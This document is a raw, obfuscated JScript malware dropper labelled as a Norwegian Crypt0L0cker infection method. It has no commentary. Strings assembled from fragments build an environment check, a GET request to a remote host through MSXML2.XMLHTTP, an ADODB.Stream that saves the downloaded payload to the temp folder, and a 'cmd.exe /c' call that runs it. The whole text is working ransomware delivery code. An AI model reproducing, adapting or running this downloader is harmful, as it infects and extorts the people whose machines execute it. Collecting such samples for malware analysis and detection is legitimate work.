Norwegian Crypt0L0cker infection method

1. var obywpot = ".Fi";
2. var bodajzu = "B.";
3. var asijdo = "bF";
4. var ymufj = "re";
5. var rotom = "me";
6. var qwofegf = " 1";
7. var wemedja = "on";
8. var rbujife = "sp";
9. var yradk = "xj";
10. var ozapqy = "pNa";
11. var ongero = "e /";
12. var omycy = "tm";
13. var axdylgy = "Sy";
14. var vwitrydb = ").";
15. var ekodpyc = "Fi";
16. var upmupry = "on";
17. var ihykci = "= ";
18. var ykyh = "l";
19. var ufisd = "emO";
20. var obego = ".i";
21. var osyrl = "Get";
22. var lyhgo = "io";
23. var newal = "ex";
24. var ufvuqis = "LHT";
25. var hlozzude = "Sc";
26. var ipuxze = "ow";
27. var atqivro = " t";
28. var ltudi = "to";
29. var wyxma = "OD";
30. var ilac = "ol";
31. var zguvin = "me";
32. var iwihe = "ne";
33. var irahg = "al";
34. var onqupkab = "lde";
35. var arodj = "_v";
36. var vnivla = "pe";
37. var ekqogi = "/f";
38. var fcupub = "g.";
39. var qwoqu = "ct";
40. var exwidxyx = "tp";
41. var kehcezr = "t.";
42. var inugenv = "dy";
43. var tewwulg = " f";
44. var lkiqekpy = "ret";
45. var azim = "um";
46. var cxetdara = "et";
47. var lgomodq = "Fi";
48. var phygvoh = "om";
49. var etipu = "ht";
50. var ybcultu = "b/";
51. var pecxonqo = "(p";
52. var wcyfuqr = "To";
53. var xebibxi = "st";
54. var amcusern = "e.";
55. var nissyju = ".n";
56. var agedu = "En";
57. var ixjub = "e;";
58. var nwimkaby = "Ope";
59. var gelygti = "ipt";
60. var hvacfyhq = "ng";
61. var egatfusr = "yst";
62. var yfovqot = "in";
63. var efatxobj = "er";
64. var jodlig = "c ";
65. var ybhyvmus = "24";
66. var thone = "bje";
67. var anyl = "ju";
68. var hytrywa = ":/";
69. var xejvobx = "p/";
70. var zqyvkynp = "Ty";
71. var xrarce = "Pos";
72. var ygyjmo = "Spe";
73. var lpindoc = "(g";
74. var qiqnew = "em";
75. var ntuqypho = "er";
76. var wuzusurpi9 = ["n", "yh", "mo", "pa", "i", "e", WScript, "rry", "ez", "i", "eq", "go", "vt", "os", "u", "lp", "cs", "e", "u", "x"][6];
77. var ixtokwyg = "ub";
78. var elworhe = "mp";
79. var awog = "e ";
80. var ubrody = "m(";
81. var jyrwyh = "Scr";
82. var gibaj = "tu";
83. var ehqoqty = "cmd";
84. var bsytuly = "je";
85. var weguzy = "iti";
86. var dtyjucl = "or";
87. var wmuqxy = "in";
88. var axomqi = "if";
89. var yhus = "St";
90. var gvaggarr = "0)";
91. var enjosa = "us";
92. var anug = "pt";
93. var urowg = "Clo";
94. var omuhno = "l_";
95. var uwacwe = "ad";
96. var ihumy = "\\\\";
97. var agluhpu = "Wr";
98. var orwuw = "se";
99. var udapebt = "ir";
100. var uhfipc = "lu";
101. var iksiqhycg = ".XM";
102. var juhquqho = "n";
103. var ujyhy = "cia";
104. var ojydd = "co";
105. var jlabfu = "et";
106. var oxulwoc = "ing";
107. var ilyzy = "ve";
108. var syja = "nd";
109. var arhike = "Wi";
110. var ezagajc = "('";
111. var agaca = "va";
112. var ntipqophu = "leS";
113. var oplawopv = " >";
114. var akevu = "se";
115. var yrakmu = "em";
116. var dwiqe = "lFo";
117. var ujmyhte = "Ob";
118. var jwuqym = "WS";
119. var ykxuhf = "t/";
120. var uryqwu = "Sh";
121. var xihi = "ld";
122. var jvebha = "it";
123. var izzerymf = "vq";
124. var vewoku = "tu";
125. var kpywi = ") ";
126. var guja = "Re";
127. var aftepw = " e";
128. var usege = "be";
129. var nwabhux = "pl";
130. var qalexu = "ep";
131. var tyhbe = "Fo";
132. var unovqo = "r";
133. var vcubapi = "rs";
134. var ycxikdoff = "ni";
135. var ewhyf = "st";
136. var iner = "Ful";
137. var pyzke = "ge";
138. var afizvu = "cr";
139. var dyzulze = ";";
140. var zephiho = "de";
141. var mqemomu = "le";
142. var ocebxy = "d";
143. var xudijx = "GET";
144. var eduhw = "bje";
145. var vetcymby = "54";
146. var owodo = "Su";
147. var reqbegsi = ".u";
148. var uvcac = "nf";
149. var amojor = "ar";
150. var ozucko = "\\\\";
151. var ywgujra = "w ";
152. var ogog = "s-";
153. var herxic = "al";
154. var qtornyjs = "re";
155. var ctejsyr = "ym";
156. var ycwanj = "e";
157. var bysebi = "rn";
158. var amysbip = "u0";
159. var agguhrac = "ra";
160. var qcycbon = "at";
161. var antevto = "el";
162. var evucu = "rn";
163. var xulysg = "ru";
164. var uskozy = "mi";
165. var ozewq = "es";
166. var kompaha = "se";
167. var ocjafu = "ls";
168. var exjiqr = "s'";
169. var etob = "ip";
170. var obpamhy = ");";
171. var mfyzji = "ct";
172. var munefc = "88";
173. var pifmahi = "tu";
174. var ovreg = "ipt";
175. var awajubg = "TP";
176. var zhovitfy = " ";
177. var erjicry = "re";
178. var elziv = "/c";
179. var umvyknud = ".ex";
180. var iresi = "r/";
181. var jyqaxi = "Sa";
182. var nahumjy = "St";
183. var vtinofu = "ML2";
184. var fhaploso = "on";
185. var ehroqqi = "69";
186. var gkeflanb = "26";
187. var nurexy = "en";
188. var kofujnu = "tiv";
189. var onypfajs = "C:";
190. var yzxebqe = "r ";
191. var ggesul = ".T";
192. var cwojxi = ".G";
193. var gofefm = "yp";
194. var dahcuji = "urn";
195. var arzoqa = "eXO";
196. var idgahvef = "st";
197. var xesojh = "Tem";
198. var hcetuzi = "AD";
199. var akol = "Scr";
200. var qmodfypda = " Ac";
201. var imlekd = "am";
202. var ebcys = "Get";
203. var mgeroqm = "/g";
204. var wnitus = "co";
205. var ycrecacj = "0 ";
206. var qrehymi = "le";
207. var ilohjan = "Bo";
208. var ftamu = "dy";
209. var ohsyq = "lNa";
210. var dupmagtu = "at";
211. var yriqe = "th";
212. var qixgoltu = "ts";
213. var hamyzwe = "sen";
214. var tedmylde = "ri";
215. var asad = "le";
216. var zxujevv = "MSX";
217. var onwyrc = "run";
218. var yvrics = "2/";
219. var anqugwejz = "65";
220. var oxhukco = "te";
221. var irtahma = "ct;";
222.  
223. function fweqijy() {
224. var nbybe = "nytkopyvycu";
225. var uvohl = hlozzude + tedmylde + anug + wmuqxy + fcupub + ekodpyc + mqemomu + axdylgy + xebibxi + yrakmu + ujmyhte + bsytuly + mfyzji;
226. var byzlyxz = "chobzopiki";
227. return uvohl;
228. }
229. function oveh() {
230. var htena = "ivxadgymtethif";
231. var ujbahwi = agaca + yzxebqe + pyzke + nwabhux + ixtokwyg + newal + anyl + ycrecacj + ihykci + iwihe + ywgujra + agedu + azim + ntuqypho + qcycbon + dtyjucl + pecxonqo + ctejsyr + inugenv + izzerymf + cwojxi + cxetdara + tyhbe + xihi + efatxobj + ezagajc + onypfajs + ihumy + arhike + syja + ipuxze + exjiqr + vwitrydb + owodo + asijdo + ilac + zephiho + vcubapi + obpamhy + zhovitfy + axomqi + lpindoc + qalexu + uhfipc + usege + yradk + amysbip + obego + oxhukco + ubrody + gvaggarr + ggesul + gofefm + amcusern + qrehymi + hvacfyhq + yriqe + oplawopv + qwofegf + kpywi + ymufj + pifmahi + evucu + atqivro + xulysg + ixjub + aftepw + ocjafu + awog + erjicry + vewoku + bysebi + tewwulg + herxic + akevu + dyzulze;
232. var ymsugxihg = "ekozygtugsu";
233. return ujbahwi;
234. }
235. function fodfe() {
236. var ydalnu = "ybwygopodqa";
237. var ilpajix = lkiqekpy + dahcuji + qmodfypda + kofujnu + arzoqa + eduhw + irtahma;
238. var alino = "avpehhomywke";
239. return ilpajix;
240. }
241. function jgodxicd() {
242. var usyfnet = "rjumfucibzila";
243. var unnyrci = zxujevv + vtinofu + iksiqhycg + ufvuqis + awajubg;
244. var ocgalq = "ovyplaramfu";
245. return unnyrci;
246. }
247. function orvubb() {
248. var puzkose = "afbutwesodd";
249. var pijrigq = akol + gelygti + oxulwoc + obywpot + ntipqophu + egatfusr + ufisd + thone + qwoqu;
250. var zyrro = "umvenigyc";
251. return pijrigq;
252. }
253. function owatyrq() {
254. var zrupamge = "evfotsepiqram";
255. var vgige = jwuqym + afizvu + etob + kehcezr + uryqwu + antevto + ykyh;
256. var atukfu = "uxqafvehycmo";
257. return vgige;
258. }
259. function hyjpihzo() {
260. var ihehnuv = "ujkosbesnacwi";
261. var imaghatp = hcetuzi + wyxma + bodajzu + yhus + qtornyjs + imlekd;
262. var kgyni = "nygevyve";
263. return imaghatp;
264. }
265. function ukdykfo() {
266. var etcipz = "umqovfemgic";
267. var zywbob = jyrwyh + ovreg + iner + ohsyq + zguvin;
268. var ojzuty = "pygmebcuhems";
269. return zywbob;
270. }
271. function jilufl() {
272. var sderobz = "fezylpennomjy";
273. var jluhzizxu = etipu + exwidxyx + hytrywa + mgeroqm + ogog + ozewq + nissyju + jlabfu + ekqogi + yvrics + omycy + xejvobx + yfovqot + ewhyf + irahg + omuhno + vetcymby + anqugwejz + gkeflanb + munefc + ybhyvmus + ehroqqi + ybcultu + uwacwe + uskozy + ycxikdoff + idgahvef + agguhrac + ltudi + iresi + ojydd + elworhe + fhaploso + nurexy + qixgoltu + elziv + phygvoh + arodj + udapebt + gibaj + qiqnew + amojor + ykxuhf + wnitus + uvcac + reqbegsi + lyhgo;
274. var ncyqop = "reradqafpicr";
275. return jluhzizxu;
276. }
277. function amimgy() {
278. var mafine = "umviqxybheciz";
279. var uvew = xudijx;
280. var efpazny = "qligygnyvijr";
281. return uvew;
282. }
283. function qkufepu() {
284. var lnumod = "gzurnuquqe";
285. var czupahu = nwimkaby + juhquqho;
286. var bpibbi = "fozexyqi";
287. return czupahu;
288. }
289. function uvaba() {
290. var qhaxo = "igogryltelc";
291. var whowxuxk = osyrl + ygyjmo + ujyhy + dwiqe + onqupkab + unovqo;
292. var ypcirud = "cahrakatusg";
293. return whowxuxk;
294. }
295. function eqhan() {
296. var runwi = "ucigqaxeh";
297. var ajifzuq = ozucko;
298. var ivveqi = "ijulonbeqluqz";
299. return ajifzuq;
300. }
301. function ojduzz() {
302. var absojwe = "khafajibasn";
303. var ipjuwj = ebcys + xesojh + ozapqy + rotom;
304. var ygnyfse = "bxaxazekqu";
305. return ipjuwj;
306. }
307. function esydg() {
308. var jdopnupa = "duhyhfojoj";
309. var ewahzu = zqyvkynp + vnivla;
310. var ynykp = "odzodekerl";
311. return ewahzu;
312. }
313. function enax() {
314. var ocyc = "benjybywacto";
315. var vgurorna = hamyzwe + ocebxy;
316. var amcidgaz = "afoczodmyp";
317. return vgurorna;
318. }
319. function cepy() {
320. var uwvez = "omvyvukzassa";
321. var gkapmuzi = ehqoqty + umvyknud + ongero + jodlig;
322. var agfubo = "itcexesyc";
323. return gkapmuzi;
324. }
325. function untozk() {
326. var jizbogzu = "iclapegucg";
327. var eqmimhi = xrarce + weguzy + upmupry;
328. var yrhehgel = "retugehi";
329. return eqmimhi;
330. }
331. function itvent() {
332. var edzyde = "jodleclujxi";
333. var qgawgorpy = nahumjy + dupmagtu + enjosa;
334. var xxyva = "gydasryxo";
335. return qgawgorpy;
336. }
337. function zarxa() {
338. var bexebe = "otmufqojynoc";
339. var zevne = agluhpu + jvebha + ycwanj;
340. var yfadkyq = "kecwungaqowo";
341. return zevne;
342. }
343. function zeblel() {
344. var yxalugg = "pysikequg";
345. var bhoqod = guja + rbujife + wemedja + kompaha + ilohjan + ftamu;
346. var fafyk = "yjmaccalcadti";
347. return bhoqod;
348. }
349. function csike() {
350. var druvytxu = "azdidsunfyt";
351. var ybhytmaqt = jyqaxi + ilyzy + wcyfuqr + lgomodq + asad;
352. var ujime = "yfegukenz";
353. return ybhytmaqt;
354. }
355. function apxafzip() {
356. var ofimob = "yglufkaryvby";
357. var xetfaju = urowg + orwuw;
358. var gkave = "ivpyveqitnekd";
359. return xetfaju;
360. }
361. function iwbovymj() {
362. var ohijg = "rtiqedpyliqe";
363. var yzgumb = onwyrc;
364. var emus = "awwiqwofes";
365. return yzgumb;
366. }
367. var ntysa = wuzusurpi9;
368. var pymdyvq = new ActiveXObject(fweqijy());
369. if (new Function(oveh())()) {
370. var qicqy04 = new Function(fodfe())();
371. var dulhebly = jgodxicd();
372. var bsijivl = fweqijy();
373. var uskiczeg0 = owatyrq();
374. var brekorynk = hyjpihzo();
375. var vifgumani0 = ntysa[ukdykfo()];
376. var adigf = new qicqy04(brekorynk);
377. var novma5 = jilufl();
378. var uhgijtu4 = new qicqy04(dulhebly);
379. var ruktehydi4 = new qicqy04(bsijivl);
380. uhgijtu4.open(amimgy(), novma5, 0);
381. adigf[qkufepu()]();
382. var xmavy5 = ruktehydi4[uvaba()](2) + eqhan() + ruktehydi4[ojduzz()]();
383. adigf[esydg()] = 1;
384. uhgijtu4[enax()]();
385. var nkydowvas3 = new qicqy04(uskiczeg0);
386. var gkuwy = cepy() + xmavy5;
387. adigf[untozk()] = 0;
388. if (uhgijtu4[itvent()] == 200) {
389. adigf[zarxa()](uhgijtu4[zeblel()]);
390. adigf[csike()](xmavy5);
391. adigf[apxafzip()]();
392. nkydowvas3[iwbovymj()](gkuwy, 0);
393. }
394. }